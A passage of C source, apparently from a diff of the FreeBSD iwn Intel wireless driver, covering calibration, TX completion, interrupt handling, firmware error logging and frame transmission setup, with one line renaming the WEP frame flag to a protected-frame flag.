return; /* Save calibration result. */ if (sc->calibcmd[idx].buf != NULL) free(sc->calibcmd[idx].buf, M_DEVBUF); sc->calibcmd[idx].buf = malloc(len, M_DEVBUF, M_NOWAIT); if (sc->calibcmd[idx].buf == NULL) { DPRINTF(sc, IWN_DEBUG_CALIBRATE, "not enough memory for calibration result %d\n", calib->code); return; } DPRINTF(sc, IWN_DEBUG_CALIBRATE, "saving calibration result idx=%d, code=%d len=%d\n", idx, calib->code, len); sc->calibcmd[idx].len = len; memcpy(sc->calibcmd[idx].buf, calib, len); } /* * Process an RX_STATISTICS or BEACON_STATISTICS firmware notification. * The latter is sent by the firmware after each received beacon. */ static void iwn_rx_statistics(struct iwn_softc *sc, struct iwn_rx_desc *desc, struct iwn_rx_data *data) { struct iwn_ops *ops = &sc->ops; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); struct iwn_calib_state *calib = &sc->calib; struct iwn_stats *stats = (struct iwn_stats *)(desc + 1); int temp; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); /* Ignore statistics received during a scan. */ if (vap->iv_state != IEEE80211_S_RUN || (ic->ic_flags & IEEE80211_F_SCAN)){ DPRINTF(sc, IWN_DEBUG_TRACE, "->%s received during calib\n", __func__); return; } bus_dmamap_sync(sc->rxq.data_dmat, data->map, BUS_DMASYNC_POSTREAD); DPRINTF(sc, IWN_DEBUG_CALIBRATE, "%s: received statistics, cmd %d\n", __func__, desc->type); sc->calib_cnt = 0; /* Reset TX power calibration timeout. */ /* Test if temperature has changed. */ if (stats->general.temp != sc->rawtemp) { /* Convert "raw" temperature to degC. */ sc->rawtemp = stats->general.temp; temp = ops->get_temperature(sc); DPRINTF(sc, IWN_DEBUG_CALIBRATE, "%s: temperature %d\n", __func__, temp); /* Update TX power if need be (4965AGN only). */ if (sc->hw_type == IWN_HW_REV_TYPE_4965) iwn4965_power_calibration(sc, temp); } if (desc->type != IWN_BEACON_STATISTICS) return; /* Reply to a statistics request. */ sc->noise = iwn_get_noise(&stats->rx.general); DPRINTF(sc, IWN_DEBUG_CALIBRATE, "%s: noise %d\n", __func__, sc->noise); /* Test that RSSI and noise are present in stats report. */ if (le32toh(stats->rx.general.flags) != 1) { DPRINTF(sc, IWN_DEBUG_ANY, "%s\n", "received statistics without RSSI"); return; } if (calib->state == IWN_CALIB_STATE_ASSOC) iwn_collect_noise(sc, &stats->rx.general); else if (calib->state == IWN_CALIB_STATE_RUN) { iwn_tune_sensitivity(sc, &stats->rx); /* * XXX TODO: Only run the RX recovery if we're associated! */ iwn_check_rx_recovery(sc, stats); iwn_save_stats_counters(sc, stats); } DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); } /* * Save the relevant statistic counters for the next calibration * pass. */ static void iwn_save_stats_counters(struct iwn_softc *sc, const struct iwn_stats *rs) { struct iwn_calib_state *calib = &sc->calib; /* Save counters values for next call. */ calib->bad_plcp_cck = le32toh(rs->rx.cck.bad_plcp); calib->fa_cck = le32toh(rs->rx.cck.fa); calib->bad_plcp_ht = le32toh(rs->rx.ht.bad_plcp); calib->bad_plcp_ofdm = le32toh(rs->rx.ofdm.bad_plcp); calib->fa_ofdm = le32toh(rs->rx.ofdm.fa); /* Last time we received these tick values */ sc->last_calib_ticks = ticks; } /* * Process a TX_DONE firmware notification. Unfortunately, the 4965AGN * and 5000 adapters have different incompatible TX status formats. */ static void iwn4965_tx_done(struct iwn_softc *sc, struct iwn_rx_desc *desc, struct iwn_rx_data *data) { struct iwn4965_tx_stat *stat = (struct iwn4965_tx_stat *)(desc + 1); struct iwn_tx_ring *ring; int qid; qid = desc->qid & 0xf; ring = &sc->txq[qid]; DPRINTF(sc, IWN_DEBUG_XMIT, "%s: " "qid %d idx %d retries %d nkill %d rate %x duration %d status %x\n", __func__, desc->qid, desc->idx, stat->ackfailcnt, stat->btkillcnt, stat->rate, le16toh(stat->duration), le32toh(stat->status)); bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_POSTREAD); if (qid >= sc->firstaggqueue) { iwn_ampdu_tx_done(sc, qid, desc->idx, stat->nframes, &stat->status); } else { iwn_tx_done(sc, desc, stat->ackfailcnt, le32toh(stat->status) & 0xff); } } static void iwn5000_tx_done(struct iwn_softc *sc, struct iwn_rx_desc *desc, struct iwn_rx_data *data) { struct iwn5000_tx_stat *stat = (struct iwn5000_tx_stat *)(desc + 1); struct iwn_tx_ring *ring; int qid; qid = desc->qid & 0xf; ring = &sc->txq[qid]; DPRINTF(sc, IWN_DEBUG_XMIT, "%s: " "qid %d idx %d retries %d nkill %d rate %x duration %d status %x\n", __func__, desc->qid, desc->idx, stat->ackfailcnt, stat->btkillcnt, stat->rate, le16toh(stat->duration), le32toh(stat->status)); #ifdef notyet /* Reset TX scheduler slot. */ iwn5000_reset_sched(sc, desc->qid & 0xf, desc->idx); #endif bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_POSTREAD); if (qid >= sc->firstaggqueue) { iwn_ampdu_tx_done(sc, qid, desc->idx, stat->nframes, &stat->status); } else { iwn_tx_done(sc, desc, stat->ackfailcnt, le16toh(stat->status) & 0xff); } } /* * Adapter-independent backend for TX_DONE firmware notifications. */ static void iwn_tx_done(struct iwn_softc *sc, struct iwn_rx_desc *desc, int ackfailcnt, uint8_t status) { struct ifnet *ifp = sc->sc_ifp; struct iwn_tx_ring *ring = &sc->txq[desc->qid & 0xf]; struct iwn_tx_data *data = &ring->data[desc->idx]; struct mbuf *m; struct ieee80211_node *ni; struct ieee80211vap *vap; KASSERT(data->ni != NULL, ("no node")); DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); /* Unmap and free mbuf. */ bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(ring->data_dmat, data->map); m = data->m, data->m = NULL; ni = data->ni, data->ni = NULL; vap = ni->ni_vap; /* * Update rate control statistics for the node. */ if (status & IWN_TX_FAIL) { ifp->if_oerrors++; ieee80211_ratectl_tx_complete(vap, ni, IEEE80211_RATECTL_TX_FAILURE, &ackfailcnt, NULL); } else { ifp->if_opackets++; ieee80211_ratectl_tx_complete(vap, ni, IEEE80211_RATECTL_TX_SUCCESS, &ackfailcnt, NULL); } /* * Channels marked for "radar" require traffic to be received * to unlock before we can transmit. Until traffic is seen * any attempt to transmit is returned immediately with status * set to IWN_TX_FAIL_TX_LOCKED. Unfortunately this can easily * happen on first authenticate after scanning. To workaround * this we ignore a failure of this sort in AUTH state so the * 802.11 layer will fall back to using a timeout to wait for * the AUTH reply. This allows the firmware time to see * traffic so a subsequent retry of AUTH succeeds. It's * unclear why the firmware does not maintain state for * channels recently visited as this would allow immediate * use of the channel after a scan (where we see traffic). */ if (status == IWN_TX_FAIL_TX_LOCKED && ni->ni_vap->iv_state == IEEE80211_S_AUTH) ieee80211_tx_complete(ni, m, 0); else ieee80211_tx_complete(ni, m, (status & IWN_TX_FAIL) != 0); sc->sc_tx_timer = 0; if (--ring->queued < IWN_TX_RING_LOMARK) { sc->qfullmsk &= ~(1 << ring->qid); if (sc->qfullmsk == 0 && (ifp->if_drv_flags & IFF_DRV_OACTIVE)) { ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; iwn_start_locked(ifp); } } DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); } /* * Process a "command done" firmware notification. This is where we wakeup * processes waiting for a synchronous command completion. */ static void iwn_cmd_done(struct iwn_softc *sc, struct iwn_rx_desc *desc) { struct iwn_tx_ring *ring; struct iwn_tx_data *data; int cmd_queue_num; if (sc->sc_flags & IWN_FLAG_PAN_SUPPORT) cmd_queue_num = IWN_PAN_CMD_QUEUE; else cmd_queue_num = IWN_CMD_QUEUE_NUM; if ((desc->qid & IWN_RX_DESC_QID_MSK) != cmd_queue_num) return; /* Not a command ack. */ ring = &sc->txq[cmd_queue_num]; data = &ring->data[desc->idx]; /* If the command was mapped in an mbuf, free it. */ if (data->m != NULL) { bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(ring->data_dmat, data->map); m_freem(data->m); data->m = NULL; } wakeup(&ring->desc[desc->idx]); } static void iwn_ampdu_tx_done(struct iwn_softc *sc, int qid, int idx, int nframes, void *stat) { struct iwn_ops *ops = &sc->ops; struct ifnet *ifp = sc->sc_ifp; struct iwn_tx_ring *ring = &sc->txq[qid]; struct iwn_tx_data *data; struct mbuf *m; struct iwn_node *wn; struct ieee80211_node *ni; struct ieee80211_tx_ampdu *tap; uint64_t bitmap; uint32_t *status = stat; uint16_t *aggstatus = stat; uint16_t ssn; uint8_t tid; int bit, i, lastidx, *res, seqno, shift, start; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); if (nframes == 1) { if ((*status & 0xff) != 1 && (*status & 0xff) != 2) { #ifdef NOT_YET printf("ieee80211_send_bar()\n"); #endif /* * If we completely fail a transmit, make sure a * notification is pushed up to the rate control * layer. */ tap = sc->qid2tap[qid]; tid = tap->txa_tid; wn = (void *)tap->txa_ni; ni = tap->txa_ni; ieee80211_ratectl_tx_complete(ni->ni_vap, ni, IEEE80211_RATECTL_TX_FAILURE, &nframes, NULL); } } bitmap = 0; start = idx; for (i = 0; i < nframes; i++) { if (le16toh(aggstatus[i * 2]) & 0xc) continue; idx = le16toh(aggstatus[2*i + 1]) & 0xff; bit = idx - start; shift = 0; if (bit >= 64) { shift = 0x100 - idx + start; bit = 0; start = idx; } else if (bit <= -64) bit = 0x100 - start + idx; else if (bit < 0) { shift = start - idx; start = idx; bit = 0; } bitmap = bitmap << shift; bitmap |= 1ULL << bit; } tap = sc->qid2tap[qid]; tid = tap->txa_tid; wn = (void *)tap->txa_ni; wn->agg[tid].bitmap = bitmap; wn->agg[tid].startidx = start; wn->agg[tid].nframes = nframes; res = NULL; ssn = 0; if (!IEEE80211_AMPDU_RUNNING(tap)) { res = tap->txa_private; ssn = tap->txa_start & 0xfff; } seqno = le32toh(*(status + nframes)) & 0xfff; for (lastidx = (seqno & 0xff); ring->read != lastidx;) { data = &ring->data[ring->read]; /* Unmap and free mbuf. */ bus_dmamap_sync(ring->data_dmat, data->map, BUS_DMASYNC_POSTWRITE); bus_dmamap_unload(ring->data_dmat, data->map); m = data->m, data->m = NULL; ni = data->ni, data->ni = NULL; KASSERT(ni != NULL, ("no node")); KASSERT(m != NULL, ("no mbuf")); ieee80211_tx_complete(ni, m, 1); ring->queued--; ring->read = (ring->read + 1) % IWN_TX_RING_COUNT; } if (ring->queued == 0 && res != NULL) { iwn_nic_lock(sc); ops->ampdu_tx_stop(sc, qid, tid, ssn); iwn_nic_unlock(sc); sc->qid2tap[qid] = NULL; free(res, M_DEVBUF); return; } sc->sc_tx_timer = 0; if (ring->queued < IWN_TX_RING_LOMARK) { sc->qfullmsk &= ~(1 << ring->qid); if (sc->qfullmsk == 0 && (ifp->if_drv_flags & IFF_DRV_OACTIVE)) { ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; iwn_start_locked(ifp); } } DPRINTF(sc, IWN_DEBUG_TRACE, "->%s: end\n",__func__); } /* * Process an INT_FH_RX or INT_SW_RX interrupt. */ static void iwn_notif_intr(struct iwn_softc *sc) { struct iwn_ops *ops = &sc->ops; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); uint16_t hw; bus_dmamap_sync(sc->rxq.stat_dma.tag, sc->rxq.stat_dma.map, BUS_DMASYNC_POSTREAD); hw = le16toh(sc->rxq.stat->closed_count) & 0xfff; while (sc->rxq.cur != hw) { struct iwn_rx_data *data = &sc->rxq.data[sc->rxq.cur]; struct iwn_rx_desc *desc; bus_dmamap_sync(sc->rxq.data_dmat, data->map, BUS_DMASYNC_POSTREAD); desc = mtod(data->m, struct iwn_rx_desc *); DPRINTF(sc, IWN_DEBUG_RECV, "%s: cur=%d; qid %x idx %d flags %x type %d(%s) len %d\n", __func__, sc->rxq.cur, desc->qid & 0xf, desc->idx, desc->flags, desc->type, iwn_intr_str(desc->type), le16toh(desc->len)); if (!(desc->qid & IWN_UNSOLICITED_RX_NOTIF)) /* Reply to a command. */ iwn_cmd_done(sc, desc); switch (desc->type) { case IWN_RX_PHY: iwn_rx_phy(sc, desc, data); break; case IWN_RX_DONE: /* 4965AGN only. */ case IWN_MPDU_RX_DONE: /* An 802.11 frame has been received. */ iwn_rx_done(sc, desc, data); break; case IWN_RX_COMPRESSED_BA: /* A Compressed BlockAck has been received. */ iwn_rx_compressed_ba(sc, desc, data); break; case IWN_TX_DONE: /* An 802.11 frame has been transmitted. */ ops->tx_done(sc, desc, data); break; case IWN_RX_STATISTICS: case IWN_BEACON_STATISTICS: iwn_rx_statistics(sc, desc, data); break; case IWN_BEACON_MISSED: { struct iwn_beacon_missed *miss = (struct iwn_beacon_missed *)(desc + 1); int misses; bus_dmamap_sync(sc->rxq.data_dmat, data->map, BUS_DMASYNC_POSTREAD); misses = le32toh(miss->consecutive); DPRINTF(sc, IWN_DEBUG_STATE, "%s: beacons missed %d/%d\n", __func__, misses, le32toh(miss->total)); /* * If more than 5 consecutive beacons are missed, * reinitialize the sensitivity state machine. */ if (vap->iv_state == IEEE80211_S_RUN && (ic->ic_flags & IEEE80211_F_SCAN) == 0) { if (misses > 5) (void)iwn_init_sensitivity(sc); if (misses >= vap->iv_bmissthreshold) { IWN_UNLOCK(sc); ieee80211_beacon_miss(ic); IWN_LOCK(sc); } } break; } case IWN_UC_READY: { struct iwn_ucode_info *uc = (struct iwn_ucode_info *)(desc + 1); /* The microcontroller is ready. */ bus_dmamap_sync(sc->rxq.data_dmat, data->map, BUS_DMASYNC_POSTREAD); DPRINTF(sc, IWN_DEBUG_RESET, "microcode alive notification version=%d.%d " "subtype=%x alive=%x\n", uc->major, uc->minor, uc->subtype, le32toh(uc->valid)); if (le32toh(uc->valid) != 1) { device_printf(sc->sc_dev, "microcontroller initialization failed"); break; } if (uc->subtype == IWN_UCODE_INIT) { /* Save microcontroller report. */ memcpy(&sc->ucode_info, uc, sizeof (*uc)); } /* Save the address of the error log in SRAM. */ sc->errptr = le32toh(uc->errptr); break; } case IWN_STATE_CHANGED: { /* * State change allows hardware switch change to be * noted. However, we handle this in iwn_intr as we * get both the enable/disble intr. */ bus_dmamap_sync(sc->rxq.data_dmat, data->map, BUS_DMASYNC_POSTREAD); #ifdef IWN_DEBUG uint32_t *status = (uint32_t *)(desc + 1); DPRINTF(sc, IWN_DEBUG_INTR | IWN_DEBUG_STATE, "state changed to %x\n", le32toh(*status)); #endif break; } case IWN_START_SCAN: { bus_dmamap_sync(sc->rxq.data_dmat, data->map, BUS_DMASYNC_POSTREAD); #ifdef IWN_DEBUG struct iwn_start_scan *scan = (struct iwn_start_scan *)(desc + 1); DPRINTF(sc, IWN_DEBUG_ANY, "%s: scanning channel %d status %x\n", __func__, scan->chan, le32toh(scan->status)); #endif break; } case IWN_STOP_SCAN: { bus_dmamap_sync(sc->rxq.data_dmat, data->map, BUS_DMASYNC_POSTREAD); #ifdef IWN_DEBUG struct iwn_stop_scan *scan = (struct iwn_stop_scan *)(desc + 1); DPRINTF(sc, IWN_DEBUG_STATE | IWN_DEBUG_SCAN, "scan finished nchan=%d status=%d chan=%d\n", scan->nchan, scan->status, scan->chan); #endif sc->sc_is_scanning = 0; IWN_UNLOCK(sc); ieee80211_scan_next(vap); IWN_LOCK(sc); break; } case IWN5000_CALIBRATION_RESULT: iwn5000_rx_calib_results(sc, desc, data); break; case IWN5000_CALIBRATION_DONE: sc->sc_flags |= IWN_FLAG_CALIB_DONE; wakeup(sc); break; } sc->rxq.cur = (sc->rxq.cur + 1) % IWN_RX_RING_COUNT; } /* Tell the firmware what we have processed. */ hw = (hw == 0) ? IWN_RX_RING_COUNT - 1 : hw - 1; IWN_WRITE(sc, IWN_FH_RX_WPTR, hw & ~7); } /* * Process an INT_WAKEUP interrupt raised when the microcontroller wakes up * from power-down sleep mode. */ static void iwn_wakeup_intr(struct iwn_softc *sc) { int qid; DPRINTF(sc, IWN_DEBUG_RESET, "%s: ucode wakeup from power-down sleep\n", __func__); /* Wakeup RX and TX rings. */ IWN_WRITE(sc, IWN_FH_RX_WPTR, sc->rxq.cur & ~7); for (qid = 0; qid < sc->ntxqs; qid++) { struct iwn_tx_ring *ring = &sc->txq[qid]; IWN_WRITE(sc, IWN_HBUS_TARG_WRPTR, qid << 8 | ring->cur); } } static void iwn_rftoggle_intr(struct iwn_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t tmp = IWN_READ(sc, IWN_GP_CNTRL); IWN_LOCK_ASSERT(sc); device_printf(sc->sc_dev, "RF switch: radio %s\n", (tmp & IWN_GP_CNTRL_RFKILL) ? "enabled" : "disabled"); if (tmp & IWN_GP_CNTRL_RFKILL) ieee80211_runtask(ic, &sc->sc_radioon_task); else ieee80211_runtask(ic, &sc->sc_radiooff_task); } /* * Dump the error log of the firmware when a firmware panic occurs. Although * we can't debug the firmware because it is neither open source nor free, it * can help us to identify certain classes of problems. */ static void iwn_fatal_intr(struct iwn_softc *sc) { struct iwn_fw_dump dump; int i; IWN_LOCK_ASSERT(sc); /* Force a complete recalibration on next init. */ sc->sc_flags &= ~IWN_FLAG_CALIB_DONE; /* Check that the error log address is valid. */ if (sc->errptr < IWN_FW_DATA_BASE || sc->errptr + sizeof (dump) > IWN_FW_DATA_BASE + sc->fw_data_maxsz) { printf("%s: bad firmware error log address 0x%08x\n", __func__, sc->errptr); return; } if (iwn_nic_lock(sc) != 0) { printf("%s: could not read firmware error log\n", __func__); return; } /* Read firmware error log from SRAM. */ iwn_mem_read_region_4(sc, sc->errptr, (uint32_t *)&dump, sizeof (dump) / sizeof (uint32_t)); iwn_nic_unlock(sc); if (dump.valid == 0) { printf("%s: firmware error log is empty\n", __func__); return; } printf("firmware error log:\n"); printf(" error type = \"%s\" (0x%08X)\n", (dump.id < nitems(iwn_fw_errmsg)) ? iwn_fw_errmsg[dump.id] : "UNKNOWN", dump.id); printf(" program counter = 0x%08X\n", dump.pc); printf(" source line = 0x%08X\n", dump.src_line); printf(" error data = 0x%08X%08X\n", dump.error_data[0], dump.error_data[1]); printf(" branch link = 0x%08X%08X\n", dump.branch_link[0], dump.branch_link[1]); printf(" interrupt link = 0x%08X%08X\n", dump.interrupt_link[0], dump.interrupt_link[1]); printf(" time = %u\n", dump.time[0]); /* Dump driver status (TX and RX rings) while we're here. */ printf("driver status:\n"); for (i = 0; i < sc->ntxqs; i++) { struct iwn_tx_ring *ring = &sc->txq[i]; printf(" tx ring %2d: qid=%-2d cur=%-3d queued=%-3d\n", i, ring->qid, ring->cur, ring->queued); } printf(" rx ring: cur=%d\n", sc->rxq.cur); } static void iwn_intr(void *arg) { struct iwn_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; uint32_t r1, r2, tmp; IWN_LOCK(sc); /* Disable interrupts. */ IWN_WRITE(sc, IWN_INT_MASK, 0); /* Read interrupts from ICT (fast) or from registers (slow). */ if (sc->sc_flags & IWN_FLAG_USE_ICT) { tmp = 0; while (sc->ict[sc->ict_cur] != 0) { tmp |= sc->ict[sc->ict_cur]; sc->ict[sc->ict_cur] = 0; /* Acknowledge. */ sc->ict_cur = (sc->ict_cur + 1) % IWN_ICT_COUNT; } tmp = le32toh(tmp); if (tmp == 0xffffffff) /* Shouldn't happen. */ tmp = 0; else if (tmp & 0xc0000) /* Workaround a HW bug. */ tmp |= 0x8000; r1 = (tmp & 0xff00) << 16 | (tmp & 0xff); r2 = 0; /* Unused. */ } else { r1 = IWN_READ(sc, IWN_INT); if (r1 == 0xffffffff || (r1 & 0xfffffff0) == 0xa5a5a5a0) return; /* Hardware gone! */ r2 = IWN_READ(sc, IWN_FH_INT); } DPRINTF(sc, IWN_DEBUG_INTR, "interrupt reg1=0x%08x reg2=0x%08x\n" , r1, r2); if (r1 == 0 && r2 == 0) goto done; /* Interrupt not for us. */ /* Acknowledge interrupts. */ IWN_WRITE(sc, IWN_INT, r1); if (!(sc->sc_flags & IWN_FLAG_USE_ICT)) IWN_WRITE(sc, IWN_FH_INT, r2); if (r1 & IWN_INT_RF_TOGGLED) { iwn_rftoggle_intr(sc); goto done; } if (r1 & IWN_INT_CT_REACHED) { device_printf(sc->sc_dev, "%s: critical temperature reached!\n", __func__); } if (r1 & (IWN_INT_SW_ERR | IWN_INT_HW_ERR)) { device_printf(sc->sc_dev, "%s: fatal firmware error\n", __func__); #ifdef IWN_DEBUG iwn_debug_register(sc); #endif /* Dump firmware error log and stop. */ iwn_fatal_intr(sc); ifp->if_flags &= ~IFF_UP; iwn_stop_locked(sc); goto done; } if ((r1 & (IWN_INT_FH_RX | IWN_INT_SW_RX | IWN_INT_RX_PERIODIC)) || (r2 & IWN_FH_INT_RX)) { if (sc->sc_flags & IWN_FLAG_USE_ICT) { if (r1 & (IWN_INT_FH_RX | IWN_INT_SW_RX)) IWN_WRITE(sc, IWN_FH_INT, IWN_FH_INT_RX); IWN_WRITE_1(sc, IWN_INT_PERIODIC, IWN_INT_PERIODIC_DIS); iwn_notif_intr(sc); if (r1 & (IWN_INT_FH_RX | IWN_INT_SW_RX)) { IWN_WRITE_1(sc, IWN_INT_PERIODIC, IWN_INT_PERIODIC_ENA); } } else iwn_notif_intr(sc); } if ((r1 & IWN_INT_FH_TX) || (r2 & IWN_FH_INT_TX)) { if (sc->sc_flags & IWN_FLAG_USE_ICT) IWN_WRITE(sc, IWN_FH_INT, IWN_FH_INT_TX); wakeup(sc); /* FH DMA transfer completed. */ } if (r1 & IWN_INT_ALIVE) wakeup(sc); /* Firmware is alive. */ if (r1 & IWN_INT_WAKEUP) iwn_wakeup_intr(sc); done: /* Re-enable interrupts. */ if (ifp->if_flags & IFF_UP) IWN_WRITE(sc, IWN_INT_MASK, sc->int_mask); IWN_UNLOCK(sc); } /* * Update TX scheduler ring when transmitting an 802.11 frame (4965AGN and * 5000 adapters use a slightly different format). */ static void iwn4965_update_sched(struct iwn_softc *sc, int qid, int idx, uint8_t id, uint16_t len) { uint16_t *w = &sc->sched[qid * IWN4965_SCHED_COUNT + idx]; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); *w = htole16(len + 8); bus_dmamap_sync(sc->sched_dma.tag, sc->sched_dma.map, BUS_DMASYNC_PREWRITE); if (idx < IWN_SCHED_WINSZ) { *(w + IWN_TX_RING_COUNT) = *w; bus_dmamap_sync(sc->sched_dma.tag, sc->sched_dma.map, BUS_DMASYNC_PREWRITE); } } static void iwn5000_update_sched(struct iwn_softc *sc, int qid, int idx, uint8_t id, uint16_t len) { uint16_t *w = &sc->sched[qid * IWN5000_SCHED_COUNT + idx]; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); *w = htole16(id << 12 | (len + 8)); bus_dmamap_sync(sc->sched_dma.tag, sc->sched_dma.map, BUS_DMASYNC_PREWRITE); if (idx < IWN_SCHED_WINSZ) { *(w + IWN_TX_RING_COUNT) = *w; bus_dmamap_sync(sc->sched_dma.tag, sc->sched_dma.map, BUS_DMASYNC_PREWRITE); } } #ifdef notyet static void iwn5000_reset_sched(struct iwn_softc *sc, int qid, int idx) { uint16_t *w = &sc->sched[qid * IWN5000_SCHED_COUNT + idx]; DPRINTF(sc, IWN_DEBUG_TRACE, "->Doing %s\n", __func__); *w = (*w & htole16(0xf000)) | htole16(1); bus_dmamap_sync(sc->sched_dma.tag, sc->sched_dma.map, BUS_DMASYNC_PREWRITE); if (idx < IWN_SCHED_WINSZ) { *(w + IWN_TX_RING_COUNT) = *w; bus_dmamap_sync(sc->sched_dma.tag, sc->sched_dma.map, BUS_DMASYNC_PREWRITE); } } #endif /* * Check whether OFDM 11g protection will be enabled for the given rate. * * The original driver code only enabled protection for OFDM rates. * It didn't check to see whether it was operating in 11a or 11bg mode. */ static int iwn_check_rate_needs_protection(struct iwn_softc *sc, struct ieee80211vap *vap, uint8_t rate) { struct ieee80211com *ic = vap->iv_ic; /* * Not in 2GHz mode? Then there's no need to enable OFDM * 11bg protection. */ if (! IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan)) { return (0); } /* * 11bg protection not enabled? Then don't use it. */ if ((ic->ic_flags & IEEE80211_F_USEPROT) == 0) return (0); /* * If it's an 11n rate, then for now we enable * protection. */ if (rate & IEEE80211_RATE_MCS) { return (1); } /* * Do a rate table lookup. If the PHY is CCK, * don't do protection. */ if (ieee80211_rate2phytype(ic->ic_rt, rate) == IEEE80211_T_CCK) return (0); /* * Yup, enable protection. */ return (1); } /* * return a value between 0 and IWN_MAX_TX_RETRIES-1 as an index into * the link quality table that reflects this particular entry. */ static int iwn_tx_rate_to_linkq_offset(struct iwn_softc *sc, struct ieee80211_node *ni, uint8_t rate) { struct ieee80211_rateset *rs; int is_11n; int nr; int i; uint8_t cmp_rate; /* * Figure out if we're using 11n or not here. */ if (IEEE80211_IS_CHAN_HT(ni->ni_chan) && ni->ni_htrates.rs_nrates > 0) is_11n = 1; else is_11n = 0; /* * Use the correct rate table. */ if (is_11n) { rs = (struct ieee80211_rateset *) &ni->ni_htrates; nr = ni->ni_htrates.rs_nrates; } else { rs = &ni->ni_rates; nr = rs->rs_nrates; } /* * Find the relevant link quality entry in the table. */ for (i = 0; i < nr && i < IWN_MAX_TX_RETRIES - 1 ; i++) { /* * The link quality table index starts at 0 == highest * rate, so we walk the rate table backwards. */ cmp_rate = rs->rs_rates[(nr - 1) - i]; if (rate & IEEE80211_RATE_MCS) cmp_rate |= IEEE80211_RATE_MCS; #if 0 DPRINTF(sc, IWN_DEBUG_XMIT, "%s: idx %d: nr=%d, rate=0x%02x, rateentry=0x%02x\n", __func__, i, nr, rate, cmp_rate); #endif if (cmp_rate == rate) return (i); } /* Failed? Start at the end */ return (IWN_MAX_TX_RETRIES - 1); } static int iwn_tx_data(struct iwn_softc *sc, struct mbuf *m, struct ieee80211_node *ni) { struct iwn_ops *ops = &sc->ops; const struct ieee80211_txparam *tp; struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct iwn_node *wn = (void *)ni; struct iwn_tx_ring *ring; struct iwn_tx_desc *desc; struct iwn_tx_data *data; struct iwn_tx_cmd *cmd; struct iwn_cmd_data *tx; struct ieee80211_frame *wh; struct ieee80211_key *k = NULL; struct mbuf *m1; uint32_t flags; uint16_t qos; u_int hdrlen; bus_dma_segment_t *seg, segs[IWN_MAX_SCATTER]; uint8_t tid, type; int ac, i, totlen, error, pad, nsegs = 0, rate; DPRINTF(sc, IWN_DEBUG_TRACE, "->%s begin\n", __func__); IWN_LOCK_ASSERT(sc); wh = mtod(m, struct ieee80211_frame *); hdrlen = ieee80211_anyhdrsize(wh); type = wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK; /* Select EDCA Access Category and TX ring for this frame. */ if (IEEE80211_QOS_HAS_SEQ(wh)) { qos = ((const struct ieee80211_qosframe *)wh)->i_qos[0]; tid = qos & IEEE80211_QOS_TID; } else { qos = 0; tid = 0; } ac = M_WME_GETAC(m); if (m->m_flags & M_AMPDU_MPDU) { uint16_t seqno; struct ieee80211_tx_ampdu *tap = &ni->ni_tx_ampdu[ac]; if (!IEEE80211_AMPDU_RUNNING(tap)) { m_freem(m); return EINVAL; } /* * Queue this frame to the hardware ring that we've * negotiated AMPDU TX on. * * Note that the sequence number must match the TX slot * being used! */ ac = *(int *)tap->txa_private; seqno = ni->ni_txseqs[tid]; *(uint16_t *)wh->i_seq = htole16(seqno << IEEE80211_SEQ_SEQ_SHIFT); ring = &sc->txq[ac]; if ((seqno % 256) != ring->cur) { device_printf(sc->sc_dev, "%s: m=%p: seqno (%d) (%d) != ring index (%d) !\n", __func__, m, seqno, seqno % 256, ring->cur); } ni->ni_txseqs[tid]++; } ring = &sc->txq[ac]; desc = &ring->desc[ring->cur]; data = &ring->data[ring->cur]; /* Choose a TX rate index. */ tp = &vap->iv_txparms[ieee80211_chan2mode(ni->ni_chan)]; if (type == IEEE80211_FC0_TYPE_MGT) rate = tp->mgmtrate; else if (IEEE80211_IS_MULTICAST(wh->i_addr1)) rate = tp->mcastrate; else if (tp->ucastrate != IEEE80211_FIXED_RATE_NONE) rate = tp->ucastrate; else if (m->m_flags & M_EAPOL) rate = tp->mgmtrate; else { /* XXX pass pktlen */ (void) ieee80211_ratectl_rate(ni, NULL, 0); rate = ni->ni_txrate; } /* Encrypt the frame if need be. */ - if (wh->i_fc[1] & IEEE80211_FC1_WEP) { + if (wh->i_fc[1] & IEEE80211_FC1_PROTECTED) { /* Retrieve key for TX. */ k = ieee80211_crypto_encap(ni, m); if (k == NULL) { m_freem(m); return ENOBUFS; } /* 802.11 header may have moved. */ wh = mtod(m, struct ieee80211_frame *); } totlen = m->m_pkthdr.len; if (ieee80211_radiotap_active_vap(vap)) { struct iwn_tx_radiotap_header *tap = &sc->sc_txtap; tap->wt_flags = 0; tap->wt_rate = rate; if (k != NULL) tap->wt_flags |= IEEE80211_RADIOTAP_F_WEP; ieee80211_radiotap_tx(vap, m); } /* Prepare TX firmware command. */ cmd = &ring->cmd[ring->cur]; cmd->code = IWN_CMD_TX_DATA; cmd->flags = 0; cmd->qid = ring->qid; cmd->idx = ring->cur; tx = (struct iwn_cmd_data *)cmd->data; /* NB: No need to clear tx, all fields are reinitialized here. */ tx->scratch = 0; /* clear "scratch" area */ flags = 0; if (!IEEE80211_IS_MULTICAST(wh->i_addr1)) { /* Unicast frame, check if an ACK is expected. */ if (!qos || (qos & 